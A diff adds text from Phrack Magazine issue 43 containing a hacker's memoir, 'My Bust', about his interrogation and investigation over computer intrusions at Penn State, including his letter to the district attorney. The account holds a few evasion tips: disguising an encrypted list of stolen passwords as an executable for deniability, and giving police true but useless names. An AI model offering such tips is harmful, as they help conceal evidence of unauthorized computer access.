+I will provide a reconstruction of the conversation.  As the police
+have refused all requests by me to receive transcripts of interviews,
+evidence and information regarding the case, I am forced to rely on
+memory.
+
+"These people are criminals.  You'd be doing the country a service
+by giving us their names."
+
+"What people are criminals?  I don't know any criminals."
+
+"Don't give me that.  We just want their names.  We won't do
+anything except ask them for information."
+
+"Yeah, sure.  Like I said, I don't know any criminals.  I'm not a criminal,
+and I won't turn in anyone for your little witch-hunt, because I don't
+know any criminals, and I'd be lying if I gave you any names."
+
+"You're not going to protect anyone.  We'll get them anyway."
+
+"If you're going to get them, you don't need my help."
+
+"We won't tell anyone that you told them about us."
+
+"Fuck that.  I'll know I did it.  How does that affect the morality
+of it, anyway?"
+
+Dropping the moral argument, he went to the emotional argument:
+
+"If you help us, we'll help you.  When you won't help us, you
+stand alone.  Those people don't care about you, anyway."
+
+"What people?  I don't know any people."
+
+"Just people who could help us with our investigation.  It doesn't
+mean that they're criminals."
+
+"I don't know anything about any criminals I said."
+
+"In fact, one of your friends turned you in.  Why should you take
+this high moral ground when you're a criminal anyway, and they'd
+do the same thing to you if they were in the situation you're in.
+You just have us now, and if you won't stand with us, you stand
+alone."
+
+"I don't have any names.  And no one I knew turned me in."
+
+This tactic, transparent as it was, instilled a worm of doubt in my mind.
+That was its purpose.
+
+This is the purpose of any of the blandishments, threats and lies
+that the police will tell you in order to get names from you.  They
+will attempt to make it appear as if you will not be harming the
+people you tell them about.  Having been told that hackers are just
+adolescent pranksters who will crack like eggs at the slightest
+pressure and cough up a speech of tearful remorse and hundreds of
+names, they will be astonished at your failure to give them names.
+
+I will here insert a statement of ethics, rather than the merely
+practical advice which I have heretofore given.  If you crack at the
+slightest pressure, don't even bother playing cyberpunk.  If
+your shiny new gadget with a Motorola 68040 chip and gee-whiz
+lightning Weitek math co-processor is more important to you than
+the lives of your friends, and you'd turn in your own grandmother
+rather than have it confiscated, please fuck off.  The computer underground
+does not need you and your lame calling-card and access code rip-offs.
+Grow up and get a job at IBM doing the same thing a million
+other people just like you are doing, buy the same car a million
+other people just like you have, and go to live in the same suburb
+that a million other people like you call home, and die quietly at
+an old age in Florida.  Don't go down squealing like a pig,
+deliberately and knowingly taking everyone you know with you.
+
+If you run the thought-experiment of imagining yourself in this
+situation, and wondering what you would do, and this description
+seems very much like what meets you in the bathroom mirror, please
+stop hacking now.
+
+However, if you feel you must turn someone in to satisfy the cops,
+I can only give the advice William S. Burroughs gives in _Junky_
+to those in a similar situation:  give them names they already have, without
+any accompanying information; give them the names of people who have left the
+country permanently.  Be warned, however, that giving false information to the
+police is a crime; stick to true, but entirely useless information.
+
+Now, for those who do not swallow the moral argument for not finking,
+I offer a practical argument.  If you tell the police about
+others you know who have committed crimes, you have admitted
+your association with criminals, bolstering their case
+against you.  You have also added an additional charge against
+yourself, that of conspiracy.  You have fucked over the very
+friends you will sorely need for support in the near future,
+because the investigation will drag on for months, leaving your life
+in a shambles.  You will need friends, and if you have sent
+them all up the river, you will have none.  Worse, you will
+deserve it.  You have confessed to the very crimes you
+are denying, making it difficult for you to stop giving them
+names if you have second thoughts.  They have the goods on you.
+
+In addition, any offers they make if you will give them names are legally
+invalid and non-binding.  They can't do jack-shit for you and wouldn't if they
+could.  The cop mind is still a human mind, and there is nothing more
+despicable to the human mind than a traitor.
+
+Do not allow yourself to become something that you can not tolerate being.
+Like Judas, the traitor commits suicide both figuratively and literally.
+
+I now retire from the soapbox and return to the confessional.
+
+My motives were pure and my conscience was clean.  With a sense
+of self-righteousness unbecoming in a person my age, I assumed that
+my integrity was invulnerability, and that my refusal to give them
+any names was going to prevent them from fucking over my friends.
+
+I had neglected to protect my email.  I had not encrypted my
+communications.  I had not carefully deleted any incriminating
+information from my disks, and because of this I am as guilty
+as the people who blithely rat out their friends.  I damaged
+the lives of a number of people by my carelessness, a number of
+people who had more at stake than I had, and all my good intentions
+were not worth a damn.  I had one encrypted file, that a list
+of compromised systems and account names, and that was DES encrypted
+with a six-character alphanumeric.
+
+As I revelled in my self-righteousness, Dan Ehrlich and Robert Owens
+arrived with a two-foot high pile of hardcopy on which was printed
+every file on my PSUVM accounts, including at least a year of email
+and all my posts to the net, including those in groups such as
+alt.drugs, and articles by other people.
+
+Wayne assumed that any item on the list, even saved posts from other
+people, was something that had been sent to me personally by its
+author, and that these people were, thus, involved in some vast conspiracy.
+While keeping the printed email out of my sight, he began listing
+names and asking me for information about that person.  I answered,
+for every person, that I knew nothing about that person except what
+they knew.  He asked such questions as "What is Emily Postnews'
+real name, and how is she involved in the conspiracy?"
+
+Ehrlich and Owens had conveniently disappeared, so I couldn't expect them to
+explain the situation to Wayne; and had, myself, given up any attempt to
+explain, realizing that anything I said would simply reinforce the cops'
+paranoid conspiracy theories.  By then, I was refusing to answer practically
+every question put to me, and finally realized I was outgunned.  When I had
+arrived, I was puffed up with bravado and certain that I could talk my way out
+of this awful situation.  Having made rather a hash of it as a hacker, I
+resorted to my old standby, my tongue, with which I had been able
+to escape any previous situation.  However, not only had I not talked
+my way out of being busted, I had talked my way further into it.
+
+If you believe, from years of experience at social engineering,
+that you will be able to talk your way out of being busted, I wish
+you luck; but don't expect it to happen.  If you talk with the police, and
+you are not under arrest at the time, expect that one or two of
+your sentences will be able to be taken out of context and used
+as a justification for issuing an arrest warrant.  If you talk with
+the police and you are under arrest, the Miranda statement:  "Anything
+you say can and will be held against you in a court of law," is perhaps
+the only true statement in that litany of lies.
+
+In any case, my bravado had collapsed.  I still pointedly
+called the cops "Wayne" and "Jeff," but otherwise, resorted to
+repeating mechanically that I knew nothing about nothing.
+
+Owens and Ehrlich returned, and announced that they had discovered
+an encrypted file on my account, called holy.nodes.  I bitterly regretted
+the flippant name, and the arrogance of keeping such a file.
+
+If you must have an encrypted list of passwords and accounts
+sitting around, at least give it a name that makes it seem like some
+sort of executable, so that you have plausible deniability.
+
+They assured me that they could decrypt it within six hours on a
+Cray Y-MP to which they had access.  I knew that the Computer Science
+Department had access to a Cray at the John von Neuman Computer Center.
+I made a brief attempt to calculate the rate of brute-force password
+cracking on a Cray and couldn't do it in my head.  However, as
+the password was only six alphanumeric characters, I realized that it
+was quite possible that it could be cracked.  I believe now that
+I should have called their bluff, but I gave them the key, yet another
+in a series of stupid moves.
+
+Shortly, they had a list of computer sites, accounts and passwords,
+and Wayne began grilling me on those.  Owens was livid when he noted
+that a machine at Lawrence-Berkeley Labs, shasta.lbl.gov, was in the
+list.  This was when my trouble started.
+
+You might recall that Lawrence-Berkeley Labs figures prominently in
+Clifford Stoll's book _The Cuckoo's Egg_.  The Chaos Computer
+Club had cracked a site there in the mistaken belief that it was Lawrence-
+Livermore.  As it happens, I had merely noticed a guest account there,
+logged in and done nothing further.  Of course, this was too
+simple an explanation for a cop to believe it.
+
+Owens had given the police a tiny bit of evidence to support the
+bizarre structure of conspiracy theories they had built; and a paranoid
+delusion, once validated in even the most inconsequential manner, becomes
+unshakably firm.
+
+Wayne returned to the interrogation with renewed vigor.  I continued
+giving answers to the effect that I knew nothing.  He came to the name of
+Raymond Gary [*], who had generously allowed me to use an old account on
+PSUVM, that of a friend of his who had left the area.  I attempted to assure
+them of his innocence.  This was another bad move.
+
+It was a bad move because this immediately reinforces the conspiracy
+theory, and the cops wish to have more information on that
+person.  I obfuscated, and returned to the habit of repeating:  "Not to
+the best of my recollection," as if I were in the Watergate hearings.
+
+Another name surfaced, that of a person who had allowed me to use his
+account because our respective machines could not manage a tolerable
+talk connection.  This person, without his knowledge, joined the
+conspiracy.  Once again, I foolishly tried to explain the situation.
+This simply made it worse, as the cop did not understand a word
+I was saying; and Owens was incapable of appreciating the difference
+between violating the letter of the law and the spirit of the law.
+
+Wayne repeatedly asked about my overseas friends, informed me that he knew
+there were foreign governments involved, again told me that a friend of mine
+had informed on me.  I was told lies so outrageous that I hesitate to put them
+on paper.  I denied everything.
+
+I made another lengthy attempt at explanation, trying to defuse the conspiracy
+theory, and gave a speech on the difference between breaking into someone's
+house and ripping off everything there, voyeuristically spying on people, and
+temporarily borrowing an account simply to talk to someone because a network
+link was not working.  I made an analogy between this and asking
+someone who is driving a corporate vehicle to give a jump to a
+disabled vehicle, and tried to explain that this was certainly not
+the same as if the authorized user of the corporate vehicle had simply
+handed a passerby the keys.  I again attempted to explain the Internet, leased
+lines, the difference between FTP and mail, why everyone on the Internet
+allowed anyone else to transfer files from, to and through their machines, and
+once again failed to explain anything.
+
+Directly following this tirade, delivered almost at a shout, Wayne
+leaned over the desk and asked me:  "Who's Bubba?"
+
+This was too much to tolerate.  My ability to take the situation
+seriously, already very shaky, simply vanished in the face of
+this absurdity.  I lost it entirely.  I laughed hysterically.
+
+I asked, my anger finally getting the better of my amusement:  "What the
+fuck kind of question is that?"
+
+He repeated the question, not appreciating the humor inherent in
+this absurd contretemps; I was beyond trying to maintain the appearance
+of solemnity.  Everything, the battered table, the primitive
+tape recorder, the stony-faced cops, the overweight computer security
+guys, seemed entirely empty of meaning.  I could no longer accept as real that
+I was in this dim room with a person asking me the question:  "Who's Bubba?"
+
+I said:  "I have no idea.  You tell me."
+
+Finally, Wayne came to Dale's name.  Dale did not use his last name
+in any of the email he had sent to me, and I hoped that his name
+was not in any file on any machine anywhere.  I recovered some of
+my equilibrium, and refused to answer.
+
+A number of references to "lab supplies" were made in the email, and
+I was questioned as to the meaning of this phrase.  I answered that
+it simply meant quarter-inch reels of tape for music.  They refused
+to accept this explanation, and accused me of running a drug ring over
+the computer network.
+
+Veiled threats, repetitions of the question, rephrasings of it,
+assurances that they were going to get everyone anyway, and similar
+cop routines followed.
+
+Finally, having had altogether too much of this nonsense, I
+said:  "This interview's over.  I'm leaving."  As simply as that,
+and as quickly, I got up and left.  I wish I could say that I did
+not look back, but I did glance over my shoulder as I left.
+
+"We'll be in touch," said Wayne.
+
+"Yeah, sure," I said.
+
+
+VII.  Thirty Pieces of Silver
+
+I informed Dale of the ominous turn in the investigation, and
+told him that the cops were now looking for him.  From a sort of fatalistic
+curiosity, we logged into Shamir's account to watch the activities
+of the computer security guys, and to confer with some of their
+associates to find out what their motivations might be.  We had
+decided that the possibility of a wiretap was slim, and that if
+there were a wiretap, we were doomed anyway, so what the hell?
+
+There is no conclusive evidence that there was a wiretap, but
+the police would not have needed a warrant to tap university
+phones, as they are on a private branch exchange, which does
+not qualify for legal protection.  In addition, one bit of
+circumstantial evidence strikes me as indicative of the possibility
+of a wiretap, that being that when Dale called Shamir to explain
+the situation, and left a message in his voice mail box, the
+message directly following Dale's was from Wayne.
+
+We frequented the library, researching every book dealing with the subject of
+computer crime, reading the Pennsylvania State Criminal Code, photocopying and
+transcribing important texts, and compiling a disk of information relevant to
+the case, including any information that someone "on the outside" would need
+to know if we were jailed.
+
+I badly sprained my ankle in this period, but walked on it for three
+miles, and it was not until later in the night that I even realized
+there was anything wrong with it, so preoccupied was I by the bizarre
+situation in which I was embroiled.  In addition, an ice storm developed,
+leaving a thin layer of ice over sidewalks, roads and the skeletal
+trees and bushes.  I must have seemed a ridiculous figure hobbling
+across the ice on a cane, looking over my shoulder every few seconds;
+and attempting to appear casual whenever a police car passed.
+
+It seemed that wherever I went, there was a police car which slowed
+to my pace, and it always seemed that people were watching me.  I
+tried to convince myself that this was paranoia, that not everyone
+could be following me, but the feeling continued to intensify, and
+I realized that I had adopted the mentality of the cops,
+that we were, essentially, part of the same societal process; symbiotic
+and necessary to each other's existence.  The term 'paranoia' had no
+meaning when applied to this situation; as there were, indeed, people
+out to get me; people who were equally convinced that I was out to
+get them.
+
+I resolved to accept the situation, and abide by its unspoken rules.
+As vast as the texts are which support the law, there is another
+entity, The Law, which is infinite and can not be explained in
+any number of words, codes or legislation.
+
+Dale and I painstakingly weighed our options.
+
+Finally, Dale decided that he was going to contact the police, and
+called a friend of his in the police department to ask for assistance
+in doing so, Stan Marks [*], who was also an electronic musician.
+On occasion, Stan would visit us in the Lab, turning off his walkie-
+talkie to avoid the irritation of the numerous trivial assignments
+which comprise the day-to-day life of the university cop.
+After conferring with Stan, he decided simply to call Wayne and
+Jeff on the phone to arrange an interview.
+
+I felt like shit.  The repercussions of my actions were spreading
+like ripples on a pond, and were to disrupt the lives of several of
+my dearest friends.  At the same time, I was enraged.  How
+dare they do this?  What had I done that warranted this torturous
+and ridiculous investigation?  Wasn't this investigation enough of
+a punishment just in and of itself?
+
+I wondered how many more innocent people would have to be fucked
+over before the police would be satisfied, and wondered how many
+innocent people, every day, are similarly fucked over in other
+investigations.  How many would it take to satisfy the cops?
+The answer is, simply, every living person.
+
+If you believe that your past, however lily-white, would withstand
+the scrutiny of an investigation of several months' duration, with
+every document and communication subjected to minute investigation,
+you are deluding yourself.  To the law-enforcement mentality, there
+are no innocent people.  There are only undiscovered criminals.
+
+Only if we are all jailed, cops and criminals alike, will the machinery lie
+dormant, to rust its way to gentle oblivion; and only then will the ruins be
+left undisturbed for the puzzlement of future archaeologists.
+
+With these thoughts, I waited as Dale went to the police station,
+with the realization that I was a traitor by inaction, by having
+allowed this to happen.
+
+I was guilty, but this guilt was not a matter of law.  My innocent
+actions were those which were to be tried.
+
+If you are ever busted, you will witness this curious inversion of
+morality, as if by entering the world of cops you have walked
+through a one-way mirror, in which your good actions are suddenly
+and arbitrarily punished, and the evil you have done is rewarded.
+
+
+VIII.  Third and Fourth Interrogations
+
+I waited anxiously for Dale to return from his meeting.  He had
+brought with him a professional tape recorder, in order to tape
+the interview.  The cops were rather upset by this turn
+of events, but had no choice but to allow him to tape.  While they
+attempted to get their tape recorder to work, he offered to loan
+them a pair of batteries, as theirs were dead.
+
+The interrogation followed roughly the same twists and turns as
+mine had, with more of an emphasis on the subject of "lab supplies."
+Question followed question, and Dale insisted that his actions were innocent.
+
+"Hell, if we'd have had a couple of nice women, none of this
+would even have happened," he said.
+
+When asked about the Huang account that Ron Gere had created for
+him, he explained that Huang was a nom-de-plume, and certainly not
+an alias for disguising crime.
+
+The police persisted, and returned to the subject of "lab supplies",
+and finally declared that they knew Dale and I were dealing in some
+sort of contraband, but that they would be prepared to offer leniency
+if he would give them names.  Dale was adamant in his refusal.
+
+Finally, they said that they wanted him to make a drug buy for
+them.
+
+"Well, you'll have to introduce me to someone, because I sure
+don't know anyone who does that kind of stuff."
+
+Eventually, they set an appointment with him to speak with Ron
+Schreffler, the university cop in charge of undercover narcotics
+investigations.
+
+He called to reschedule the appointment a few days later, and then,
+eventually, cancelled it entirely, saying:  "I have nothing to talk
+to him about."
+
+Finally, they ceased following this tack, realizing that even in
+Pennsylvania pursuing an entirely fruitless avenue of investigation
+is seen very dimly by their superiors.  The topic of "lab supplies"
+was never mentioned again, and certainly not in the arrest warrant
+affidavit, as we were obviously innocent of any wrongdoing in that
+area.
+
+Warning Dale not to leave the area, they terminated the interview.
+
+Shortly thereafter, there was a fourth and final interview, with
+Dale and I present.  We discussed nothing of any significance, and
+it was almost informal, as if we and the cops were cronies of some sort.
+Only Jeffery Jones was excluded from this circle, as he was limited
+largely to monosyllabic grunts and wild, paranoid accusations.  We
+discovered that Wayne Weaver was a twenty-three year veteran, and
+it struck me that if I had met him in other circumstances I could
+have found him quite likable.  He was, if nothing else, a professional,
+and acted in a professional manner even when he was beyond his
+depth in the sea of information which Dale and I navigated with
+ease.
+
+I felt almost sympathetic toward him, and wondered how it was for
+him to be involved in a case so complex and bizarre.  I still failed
+to realize why he was acting toward us as he was, and realized that
+he, similarly, had no idea what to make of us, who must have seemed
+to him like remorseless, arrogant criminals.  Unlike my prejudiced
+views of what a police officer should be, Wayne was a competent,
+intelligent man doing the best he could in a situation beyond his
+range of experience, and tried to behave in a conscientious manner.
+
+I feel that Wayne was a good man, but that the very system
+he upheld gave him no choice but to do evil, without realizing it.
+I am frustrated still by the fact that no matter how much we could
+discuss the situation, we could never understand each other in
+fullness, because our world-views were so fundamentally different.
+Unlike so many of the incompetent losers and petty sadists who
+find police work a convenient alternative to criminality, Wayne
+was that rarity, a good cop.
+
+Still, without an understanding of the computer subculture, he could not but
+see anything we might say to explain it to him as anything other than alien
+and criminal, just as a prejudiced American finds a description of the customs
+of some South Sea tribe shocking and bizarre.  Until we realize what
+underlying assumptions we share with the rest of society, we shall be
+divided, subculture from culture, criminals from police.
+
+The ultimate goal of the computer underground is to create the circumstances
+which will underlie its own dissolution, to enable the total and free
+dissemination of all information, and thus to destroy itself by becoming
+mainstream.  When everyone thinks nothing of doing in daylight what we are
+forced to do under cover of darkness, then we shall have succeeded.
+
+Until then, we can expect the Operation Sun-Devils to continue,
+and the witch-hunts to extend to every corner of cyberspace.  The
+public at large still holds an ignorant dread of computers, having
+experienced oppression by those who use computers as a tool of
+secrecy and intrusion, having been told that they are being audited
+by the IRS because of "some discrepancies in the computer," that
+their paycheck has been delayed because "the computer's down,"
+that they can't receive their deceased spouse's life-insurance benefits
+because "there's nothing about it in the computer."  The computer
+has become both omnipresent and omnipotent in the eyes of many,
+is blamed by incompetent people for their own failure, is used
+to justify appalling rip-offs by banks and other major social
+institutions, and in addition is not understood at all by the
+majority of the population, especially those over thirty, those
+who comprise both the law-enforcement mentality and aging hippies,
+both deeply distrustful of anything new.
+
+It is thus that such a paradox would exist as a hacker, and if
+we are to be successful, we must be very careful to understand
+the difference between secrecy and privacy.  We must understand
+the difference between freedom of information and freedom from
+intrusion.  We must understand the difference between invading
+the inner sanctum of oppression and voyeurism, and realize that
+even in our finest hours we too are fallible, and that in
+negotiating these finely-hued gray areas, we are liable to
+lose our path and take a fall.
+
+In this struggle, we can not allow a justifiable anger to become
+hatred.  We can not allow skepticism to become nihilism.  We can
+not allow ourselves to harm innocents.  In adopting the
+intrusive tactics of the oppressors, we must not allow ourselves
+to perform the same actions that we detest in others.
+
+Perhaps most importantly, we must use computers as tools to serve
+humanity, and not allow humans to serve computers.  For the
+non-living to serve the purposes of the living is a good and
+necessary thing, but for the living to serve the purposes of
+the non-living is an abomination.
+
+
+
+ 
\ No newline at end of file
diff --git a/phrack43/13.txt b/phrack43/13.txt
new file mode 100644
index 0000000..d5a1ef6
--- /dev/null
+++ b/phrack43/13.txt
@@ -0,0 +1,1160 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 13 of 27
+
+                              [My Bust Continued]
+
+
+IX.  Consultations
+
+Dale and I began to consider options in our battle against this senseless
+investigation.  We spent many nights pondering the issue, and arrived at a
+number of conclusions.
+
+Since we had already talked to the police, and were rapidly realizing
+what a vast error that had been, we wondered how it was possible
+to sidestep, avoid or derail the investigation.  We hoped that Ron
+Gere and others would not be held accountable for my actions, a wish
+that was to be denied.
+
+A great deal of resentment existed toward me in those whose
+lives were affected, and I would be either an idiot or a liar to deny
+that my actions affected many people, in many places, some of whom I
+had never even met in person.  However, I was unable to do anything
+for many of these people, so I concentrated largely on my own survival
+and that of those near me.
+
+Dale and I decided, eventually, that the only person who could claim
+any real damage was Dhamir Mannai, and we arranged an
+appointment with him to discuss what had happened.
+
+We met in his book-lined office in the Electrical Engineering Office,
+and shook hands before beginning a discussion.  I explained what
+I had done, and why I had done it, and apologized for any damages that
+had occurred.  Dale, similarly, excused my actions, and while he had
+nothing to do with them, noted that he was under investigation as well.
+
+We offered to help repair the /etc/groups file which I had damaged,
+but due to the circumstances, it is understandable that he politely
+declined our offer.
+
+Dhamir was surprisingly sympathetic, though justifiably angered.  However,
+after about a half hour of discussion, he warmed from suspicion to
+friendliness, and after two hours of discussion he offered to testify
+for us against the police, noting that he had been forced on two previous
+occasions to testify against police.  He held a very dim
+view of the investigation, and noted that "The police have bungled the case
+very badly."  Dhamir, in fact, was so annoyed by the investigation that he
+called Wayne that night to object to it.  He made it clear that he
+intended to oppose the police.
+
+The next night, as Dale and I were entering the Music Building, a police
+cruiser came to a sudden stop in the parking lot and Wayne walked up to
+us with a perturbed expression.
+
+Without pausing for greetings, he informed us that he was now
+considering filing additional charges against us for "Tampering with
+Witnesses," without identifying the witness.  In his eyes, the legality
+of restraining our actions and speech based on hypothetical and unfiled
+charges was not relevant; and he was angry that a primary witness had
+been rendered useless to him.
+
+Finally, we talked more informally.  Genuinely curious about his
+motivations, we asked him about the investigation and what turns
+could be expected in the future.  Realizing that the investigation
+had entered a quiescent stage and we would not likely meet again
+until court, we talked with him.
+
+Dale said "So let me get this straight.  They saddled the older,
+more experienced cop with the recruit?"
+
+Wayne didn't answer, but nodded glumly.
+
+"What's this like for you?" I asked.
+
+"Well, I have to admit, in my twenty-three years on the force,
+this case is the biggest hassle I've ever had."
+
+"I can see why," said Dale.
+
+"I almost wish you had been in charge of this case, instead of that
+goof Jeff," I said.
+
+"Yes, he's too jumpy," said Dale.  "Like an Irish Setter with a gun."
+
+"Well, if I'd been in charge of this case," Wayne said, "it would have
+been down the pike a long time ago."
+
+After more discussion of this sort, Wayne's walkie-talkie burst into
+cop chatter.
+
+"We have three men, throwing another man, into a dumpster, behind
+Willard," the voice said.
+
+"I guess this means you have to leave, Wayne," said Dale.
+
+Wayne looked embarrassed.  We exchanged farewells.
+
+Another very helpful person was Professor Richard Devon,
+of the Science, Technology and Science department of Penn State.  We
+read an article he wrote on the computer underground which, while
+hardly condoning malicious hacking, certainly objected to the prevailing
+witch-hunt mentality.  We contacted him to discuss the case.
+
+He offered to provide testimony in our behalf, and informed us
+of the prevailing attitudes of computer security professionals at
+Penn State and elsewhere.  He corroborated our belief that the
+vendetta against us was largely due to the fact that we had embarrassed
+Penn State, and that the intensity of the investigation was also largely
+due to fallout from the Morris Worm incident.
+
+The fact that he was on the board of directors for the Engineering Computer
+Lab increased the value of his testimony.  We were expecting damaging
+testimony from Bryan Jensen of ECL.
+
+He was friendly and personable, and we talked for several hours.
+
+While there was nothing he could do until the time came to give testimony,
+it was very gratifying to find two friends and allies in what we had
+thought was a hostile camp.
+
+Our feeling of isolation and paranoia began to dwindle, and we began to
+feel more confident about the possible outcome of the investigation.
+
+
+X.  Going Upstairs
+
+With a new-found confidence, we decided to see if it were possible to
+end this investigation entirely before charges were filed and it
+became a criminal prosecution.
+
+Dale called the Director of Police Services with the slim hope that
+he had no knowledge of this investigation and might intervene to stop
+it.  No dice.
+
+Dale and I composed a letter to the district attorney objecting to
+the investigation, also in the hopes of avoiding the prosecution of
+the case.  I include the letter:
+
+
+    Dear Mr. Gricar:
+
+    We are writing to you because of our concerns regarding an investigation
+    being conducted by the Pennsylvania State University Department of
+    University Safety with respect to violations of Pa.C.S.A. tilde 3933
+    (Unlawful Use of Computer) alleged to us.  We have enclosed a copy of
+    this statute for your convenience.
+
+    Despite recommendations from NASA security officials and concerned members
+    of the professional and academic computing community that we file suit
+    against the Pennsylvania State Universities, we have tried earnestly to
+    accommodate this investigation.
+
+    We have cooperated fully with Police Services Officers Wayne Weaver
+    and Jeffrey Jones at every opportunity in this unnecessary eight-week
+    investigation.   However, rather than arranging for direct communication
+    between the complaining parties and us to make it possible to make clear
+    the nature of our activities, the University Police have chosen to siphon
+    information to these parties in an easily-misinterpreted and secondhand
+    manner.  This has served only to obscure the truth of the matter and create
+    confusion, misunderstanding and inconvenience to all involved.
+
+    The keen disappointment of the University Police in finding that we have
+    not been involved in espionage, electronic funds transfer or computer
+    terrorism appears to have finally manifested itself in an effort to
+    indict us for practices customary and routine among faculty and students
+    alike. While we have come to realize that activities such as using a
+    personal account with the permission of the authorized user may constitute
+    a violation of an obscure and little-known University policy, we find it
+    irregular and unusual that such activities might even be considered a
+    criminal offense.
+
+    The minimal and inferential evidence which either will
+    or has already been brought before you is part of a preposterous attempt to
+    shoehorn our alleged actions into the jurisdiction of a law which lacks
+    relevance to a situation of this nature.
+
+    We have found this whole affair to be capricious and arbitrary, and despite
+    our reasonable requests to demonstrate and display our activities in the
+    presence of computer-literate parties and with an actual computer, they
+    have, for whatever reasons, denied direct lines of communication which
+    could have enabled an expeditious resolution to this problem.
+
+    This investigation has proceeded in a slipshod manner, rife with inordinate
+    delays and intimidation well beyond that justified by an honest desire to
+    discern the truth.  While certain evidence may appear to warrant scrutiny,
+    this evidence is easily clarified; and should the District Attorney's
+    office desire, we would be pleased to provide a full and complete
+    accounting of all our activities at your convenience and under oath.
+
+    In view of the judicial system being already overtaxed by an excess of
+    important and pressing criminal cases, we would like to apologize for
+    this matter even having encroached on your time.
+
+                                      Sincerely yours,
+
+
+
+                                      Dale Garrison
+                                      Robert W. F. Clark
+
+
+This letter had about as much effect as might be imagined, that is to
+say, none whatever.
+
+My advice from this experience is that it is very likely that you will
+be able to find advice in what you might think to be a hostile quarter.
+To talk to the complaining party and apologize for any damage you might
+have caused is an excellent idea, and has a possibility of getting the
+charges reduced or perhaps dropped entirely.
+
+Simply because the police list a person as a complaining party does not
+necessarily mean that the person necessarily approves of, or even has
+knowledge of, the police proceedings.  In all likelihood, the complaining
+parties have never met you, and have no knowledge of what your
+motivations were in doing what you did.  With no knowledge of your motives,
+they are likely to attribute your actions to malice.
+
+If there are no demonstrable damages, and the person is sympathetic, you
+may find an ally in the enemy camp.  Even if you have damaged a machine,
+you are in a unique position to help repair it, and prevent further
+intrusion into their system.
+
+Regardless of the end result, it can't hurt to get some idea of what
+the complaining parties think.  If you soften outright hostility and
+outrage even to a grudging tolerance, you have improved the chance
+of a positive outcome.
+
+While the police may object to this in very strong terms, and make dire
+and ambiguous threats, without a restraining order of some kind there
+is very little they can do unless you have bribed or otherwise
+offered a consideration for testimony.
+
+Talking to the police, on the other hand, is a very bad idea, and
+will result in disaster.  Regardless of any threats and intimidation they
+use, there is absolutely nothing they can do to you if you do not
+talk to them.  Any deal they offer you is bogus, a flat-out lie.  They
+do not have the authority to offer you a deal.  These two facts can not
+be stressed enough.  This may seem common knowledge, the sort even an
+idiot would know.  I knew it myself.
+
+However, from inexperience and arrogance I thought myself immune
+to the rules.  I assumed that talking to them could damage nothing,
+since I had done nothing wrong but make a mistake.  Certainly
+this was just a misunderstanding, and I could easily clear it up.
+
+The police will encourage you to believe this, and before you realize it
+you will have told them everything they want to know.
+
+Simply, if you are not under arrest, walk away.  If you are
+under arrest, request an attorney.
+
+Realize that I, a confirmed paranoid, knowing and having heard this
+warning from other people, still fell into the trap of believing myself
+able to talk my way out of prosecution.  Don't do the same thing
+yourself, either from fear or arrogance.
+
+Don't tell them anything.  They'll find out more than enough without
+your help.
+
+
+XI.  Interlude
+
+Finally, after what had seemed nearly two weeks of furious activity,
+constant harassment and disasters, the investigation entered a more
+or less quiescent state.  It was to remain in this state for several
+months.
+
+This is not to say that the harassment ceased, or that matters improved.
+The investigation seemed to exist in a state of suspended animation, from
+our viewpoint.  Matters ceased getting worse exponentially.
+Now, they merely got worse arithmetically.
+
+My parents ejected me from home for the second time due to my
+grades.  They did not know about the police investigation.  I
+was in no hurry to tell them about it.  I could have went to live
+with my father, but instead I returned to State College by bus, with no
+money, no prospects and no place to live.  I blamed the police
+investigation for my grades, which was not entirely correct.  I
+doubt, however, that I would have failed as spectacularly as I had
+if the police had not entered my life.
+
+Over the Christmas break, when the campus was mostly vacant, Dale
+noticed a new set of booted footprints in the new-fallen snow every
+night, by the window to the Electronic Music Lab, and by that window
+only.
+
+A few times, I heard static and odd clicks on the telephone at
+the Lab, but whether this was poor telephone service or some
+clumsy attempt at a wiretap I can not say with assurance.
+
+I discovered that my food card was still valid, so
+I had a source of free food for a while.  I had switched to a
+nocturnal sleep cycle, so I slept during the day in the Student Union
+Building, rose for a shower in the Athletics Building at about midnight,
+and hung out in the Electronic Music Lab at night.  Being homeless is not as
+difficult as might be imagined, especially in a university environment,
+as long as one does not look homeless.  Even if one does look scruffy,
+this will raise few eyebrows on a campus.
+
+Around this time, I switched my main interest from computer hacking to
+reading and writing poetry, being perhaps the thousandth neophyte poet
+to use Baudelaire as a model.  I suppose that I was striving to create
+perfection from imperfect materials, also my motivation for hacking.
+
+Eventually, Dale offered to let me split the rent with him on a room.
+The police had 'suggested' that WPSX-TV3 fire him from his job as an
+audio technician.  Regardless of the legality of this skullduggery,
+WPSX-TV3, a public television station, reprehensibly fired him.
+This is another aspect of the law-enforcement mentality which bears
+close examination.
+
+While claiming a high moral ground, as protectors of the community,
+they will rationalize a vendetta as somehow protecting some vague and
+undefined 'public good.'  With the zeal of vigilantes, they
+will eschew the notion of due process for their convenience.  Considering
+the law beneath them, and impatient at the rare refusal of judges and
+juries to be a rubber-stamp for police privilege, they will take
+punishment into their own hands, and use any means necessary to destroy
+the lives of those who get in their way.
+
+According to the Random House Dictionary of the English Language
+(Unabridged Edition):
+
+    Police state:  a nation in which the police, especially a
+    secret police, suppresses any act by an individual or group
+    that conflicts with governmental policy or principle.
+
+Since undisclosed members of CERT, an organization directly
+funded by Air Force Intelligence, are authorized to make anonymous
+accusations of malfeasance without disclosing their identity, they
+can be called nothing but secret police.
+
+The spooks at the CIA and NSA also hold this unusual privilege, even if
+one does not consider their 'special' operations.  What can these
+organizations be called if not secret police?
+
+It can not be denied, even by those myopic enough to believe that such
+organizations are necessary, that these organizations comprise a vast
+and secret government which is not elected and not subject to legal
+restraint.  Only in the most egregious cases of wrongdoing are these
+organizations even censured; and even in these cases, it is only the
+flunkies that receive even a token punishment; the principals, almost
+without exception, are exonerated and even honored.  Those few
+who are too disgraced to continue work even as politicians ascend to
+the rank of elder statesmen, and write their memoirs free from
+molestation.
+
+When your job, your property and your reputation can be destroyed
+or stolen without recompense and with impunity, what can our
+nation be called but a police state?  When the police are even free
+to beat you senseless without provocation, on videotape, and still
+elude justice, what can this nation be called but a police state?
+
+Such were my thoughts during the months when the investigation
+seemed dormant, as my anger began, gradually, to overcome
+my fear.  This is the time that I considered trashing
+the Penn State data network, the Internet, anything I could.
+Punishment, to me, has always seemed merely a goad to future
+vengeance.  However, I saw the uselessness of taking revenge on
+innocent parties for the police's actions.
+
+I contacted the ACLU, who showed a remarkable lack of interest in
+the case.  As charges had not been filed, there was little they
